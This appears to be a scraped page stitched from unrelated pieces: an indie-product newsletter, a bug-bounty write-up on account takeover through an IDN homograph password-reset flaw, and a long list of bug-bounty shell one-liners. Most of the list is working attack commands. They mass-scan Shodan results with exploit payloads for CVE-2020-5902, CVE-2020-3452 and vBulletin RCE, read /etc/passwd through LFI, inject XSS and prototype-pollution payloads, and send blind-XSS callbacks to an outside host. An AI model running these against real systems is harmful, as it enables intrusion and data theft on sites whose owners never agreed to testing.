Daily Thoughts, December 2021


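Indie Dev Monetization Weekly (Issue 30): Free, Beautiful Illustrations

Valuable content on indie development and product monetization, published every Friday.

Contents

  • 1. Cotter: a passwordless login component for websites
  • 2. Poet.so: generate gorgeous Twitter cards
  • 3. Designstripe: free, beautiful illustrations
  • 4. Typeform: bringing form collection to life with interaction
  • 5. Medusa: an open-source Shopify alternative
  • 6. Chilly.tools: see rare NFTs directly on OpenSea

1. Cotter: a passwordless login component for websites

Cotter is a passwordless login component that can be easily embedded in your website. You configure the login component's style and some post-login rules online, then embed it in your website through a link. Users who arrive at the site can then log in to gain access to certain content. None of this requires writing code; it is all configured online.

Cotter is used by more than 3,000 developers and has been acquired by Stytch.

cotter.app website[1]

2. Poet.so: generate gorgeous Twitter cards

This is a small tool that helps you create eye-catching images of Twitter posts. The product ranked first on Product Hunt for the day.

Outside Twitter, the usual ways of sharing a post look a bit dull. With this tool you enter a URL, the post content is extracted automatically, and after editing online you get a gorgeous, very appealing image.

One commenter mentioned another use case: when writing a book that uses screenshots from Twitter, ordinary screenshots look ugly, and this small tool is exactly what helps.

The author monetizes by limiting the number of extractions.

poet.so website[2]

3. Designstripe: free, beautiful illustrations

As illustration-style websites become more common, demand for illustration design keeps growing. The illustrations on the designstripe website are all of very high quality, and it offers free plugin downloads.

There are also paid illustrations, which can be edited and configured online; using the provided plugin components, you can design your own unique illustrations.

designstripe website[3]

4. Typeform: bringing form collection to life with interaction

The overall style and interaction experience of the typeform website are excellent. Typeform focuses on form collection. What sets it apart from traditional form-collection products is that it offers more dynamic interaction, such as images and video, so users get a more elegant experience while filling in a form. The site also provides many template examples, such as questionnaires, quizzes, opinion surveys and so on.

Typeform website[4]

5. Medusa: an open-source Shopify alternative

Medusa is a headless commerce backend that provides 2 default front ends. It is a highly customizable commerce API and provides the common service modules, such as orders, carts, products, payments, shipping and so on. If you want to build your own store, this project is worth a look.

It has more than 3K stars on GitHub and provides a CLI for installing and starting the application.

Medusa GitHub repository[5]

6. Chilly.tools: see rare NFTs directly on OpenSea

The chilly.tools Chrome extension gives you NFT rarity scores, rarity rankings, and collection volume/price trends, all viewable directly on OpenSea.

Nikita did not expect anyone to pay 0.99 ETH for this service in such a niche market.

chilly.tools website[6]

  1. cotter.app website: https://www.cotter.app/
  2. poet.so website: https://poet.so/
  3. designstripe website: https://designstripe.com/
  4. Typeform website: https://www.typeform.com/
  5. Medusa GitHub repository: https://github.com/medusajs/medusa
  6. chilly.tools website: https://chilly.tools/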


How I was able to change victim’s password using IDN Homograph Attack

Abhishek Karle

Hey guys Abhishek this side. This is my first writeup. This article is about a vulnerability I was able to find in the BugCrowd private program.

What is IDN homograph attack?

The internationalized domain name (IDN) homograph attack is a way a malicious party may deceive computer users about what remote system they are communicating with, by exploiting the fact that many different characters look alike (i.e., they are homographs, hence the term for the attack, although technically homoglyph is the more accurate term for different characters that look alike). For example, a regular user of example.com may be lured to click a link where the Latin character “a” is replaced with the Cyrillic character “а”.

One day I saw an interesting #bugbountytips post on Twitter: https://twitter.com/musiclouderlml/status/1276987908340232193?s=19

Then I thought, why not give it a try. I started hunting for this bug on a Bugcrowd private program. Let’s call it target.com.

The web application endpoint “https://target.com/forgot-password?email=” fails to properly validate the value of “email”, which was used to take over the user’s account by changing his password using an IDN homograph attack.

The IDN homograph attack exploits the fact that many different characters look alike: “a” is different from “á”, because the latter carries an acute accent, yet it looks almost exactly like “a”. Suppose the victim’s account is abc@gmail.com. The attacker asks for a password reset link for abc@gmáil.com, and target.com’s mail system sends the password reset link of the victim, abc@gmail.com, to the attacker’s mail, abc@xn--gmil-6na.com. To perform this attack, the attacker has to buy the domain xn--gmil-6na.com.
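The validation flaw described above, shown beside a hardened reset handler, as an added Python example that is not code from the original write-up or from target.com. It assumes the account lookup used an accent-insensitive comparison (the write-up does not state the cause); `USERS`, `fold_accents`, `reset_vulnerable` and `reset_hardened` are hypothetical names.

```python
import unicodedata

# Constructed sample account store; the address is the one used in the write-up.
USERS = {"abc@gmail.com": {"id": 1}}


def fold_accents(text):
    """Drop combining marks after NFKD, mimicking an accent-insensitive
    comparison (assumed cause; the write-up does not name it)."""
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(c for c in decomposed if not unicodedata.combining(c)).lower()


def to_ascii_address(addr):
    """Return local@domain with the domain as an A-label (xn--...),
    which is the form a mail server actually routes on."""
    local, _, domain = addr.rpartition("@")
    if not local or not domain:
        raise ValueError("not an e-mail address")
    return local + "@" + domain.encode("idna").decode("ascii")


def reset_vulnerable(submitted):
    """Finds the account with a loose match, then mails the SUBMITTED address.
    Returns the recipient of the reset link, or None if no account matched."""
    for stored in USERS:
        if fold_accents(stored) == fold_accents(submitted):
            return to_ascii_address(submitted)  # recipient chosen by the requester
    return None


def reset_hardened(submitted):
    """Exact match on the ASCII form, and the recipient is always the address
    stored for the account, never the request parameter."""
    try:
        candidate = to_ascii_address(submitted.strip()).lower()
    except (ValueError, UnicodeError):
        return None
    for stored in USERS:
        if stored.lower() == candidate:
            return stored  # recipient comes from the account record
    return None


if __name__ == "__main__":
    for email in ("abc@gmail.com", "abc@gm\u00e1il.com"):
        print(email, "->", reset_vulnerable(email), "|", reset_hardened(email))
```

Logging reset requests whose ASCII form differs from the submitted string gives a cheap detection signal for this class of request.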

How to test without buying a domain?

  • The answer is to use the Burp Collaborator client.

We have to create an account on target.com with the email abc@gmail.com.burpcollaboratorpayloadhere

So when we ask for a password reset link for abc@gmáil.com.burpcollaboratorpayloadhere, target.com sends the password reset link of the user abc@gmail.com.burpcollaboratorpayloadhere to the mail abc@xn--gmil-6na.com.burpcollaboratorpayloadhere, and the password reset link is received in the Burp Collaborator client. Make sure to check the received email details in the Burp Collaborator client: To: abc@xn--gmil-6na.com.burpcollaboratorpayloadhere.

Steps to reproduce-

  1. Open the Burp Collaborator client > Generate Collaborator payload.
  2. Go to the sign-up page of target.com and create a new account with the email abc@gmail.com.burpcollaboratorpayloadhere
  3. Now if target.com has email confirmation > you will receive the email confirmation link in the Burp Collaborator client > verify the email.
  4. Go to the password reset page of target.com > enter the email as abc@gmáil.com.burpcollaboratorpayloadhere
  5. If target.com is vulnerable, it will send the password reset link to the mail abc@xn--gmil-6na.com.burpcollaboratorpayloadhere and you will receive the password reset link in the Burp Collaborator client. Make sure to check the received email details in the Burp Collaborator client: To: abc@xn--gmil-6na.com.burpcollaboratorpayloadhere.
  6. Now you can change the password and access the victim’s account.

Result-

Special thanks to https://twitter.com/musiclouderlml for sharing #bugbountytips.

Hope you guys enjoyed. Thanks for reading.

Bug Bounty One-Liners

Bug Bounty

A collection of awesome one-liner scripts especially for bug bounty tips.


This repository stores and houses various one-liners for bug bounty tips, provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.

Local File Inclusion

@dwisiswant0

gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

@dwisiswant0

export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

@N3T_hunt3r

cat waybackurl.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS

@cihanmehmet

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

@fanimalikhack

 waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

Prototype Pollution

@R0X4R

subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

CVE-2020-5902

@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

CVE-2020-3452

@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt

vBulletin 5.6.2 – ‘widget_tabbedContainer_tab_panel’ Remote Code Execution

@Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JS Files

@D0cK3rG33k

assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9_]+" |sed -e 's,'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Extract Endpoints from JS File

@renniepak

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Orgz from Target Lists

@steve_mcilwain

for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done

Get Subdomains from RapidDNS.io

@andirrahmani1

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run

@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.DOMAIN.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u

@AnubhavSingh_

curl "https://tls.bufferover.run/dns?q=$DOMAIN" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$DOMAIN"

Get Subdomains from Riddler.io

@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:domain.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal

@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore

@pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=yahoo.com -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter

@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=domain.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | tr -d '[]"\n ' | tr ',' '\n'

Get Subdomains from Archive

@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC

@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

@pikpikcu

curl -s "https://securitytrails.com/list/apex_domain/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".domain.com" | sort -u

Bruteforcing subdomain using DNS Over

@pikpikcu

while read sub;do echo "https://dns.google.com/resolve?name=$sub.domain.com&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".domain.com" | sort -u ; done < wordlists.txt

Get Subdomains With sonar.omnisint.io

@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/twitter.com | grep -oE "[a-zA-Z0-9._-]+\.twitter.com" | sort -u 

Get Subdomains With synapsint.com

@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2Fdomain.com" | grep -oE "[a-zA-Z0-9._-]+\.domain.com" | sort -u 

Get Subdomains from crt.sh

@vict0ni

curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev

@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=example.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent

Subdomain Bruteforcer with FFUF

@GochaOqradze

ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'

Find All Allocated IP ranges for ASN given an IP address

wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File

@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare

@dwisiswant0

subfinder -silent -d uber.com | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists

@tomnomnom

gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat domains.txt);do /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done

Find Subdomains TakeOver

@hahwul

subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

Get multiple target’s Custom URLs from ParamSpider

@hahwul

cat domains | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;

URLs Probing with cURL + Parallel

@akita_zen

cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list

@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data

@dwisiswant0

HackerOne Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Get all the urls out of a sitemap.xml

@healthyoutlet

curl -s domain.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure bash Linkfinder

@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

Extract Endpoints from swagger.json

@zer0pwn

curl -s https://domain.tld/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration

@manas_hunter

site="https://example.com"; gau "$site" | while read -r url; do if curl -s -I -H "Origin: https://evil.com" -X GET "$url" | grep -q 'https://evil.com'; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done

Find Hidden Servers and/or Admin Panels

@rez0__

ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txt

Recon using api.recon.dev

@z0idsec

curl -s -w "\n%{http_code}" "https://api.recon.dev/search?domain=site.com" | jq '.[].domain'

Find live host/domain/assets

@YashGoti

subfinder -d http://tesla.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf

@HacktifyS

waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Extract endpoints from APK files

@laughface809

apkurlgrep -a path/to/file.apk

Get Subdomains from IPs

@laughface809

python3 hosthunter.py <target-ips.txt> > vhosts.txt

webscreenshot

@laughface809

python webscreenshot.py -i list.txt -w 40

Removes duplicate URLs and parameter combinations

@laughface809

cat urls.txt |qsreplace -a

Gather domains from content-security-policy:

@geeknik

curl -v -silent https://$domain --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u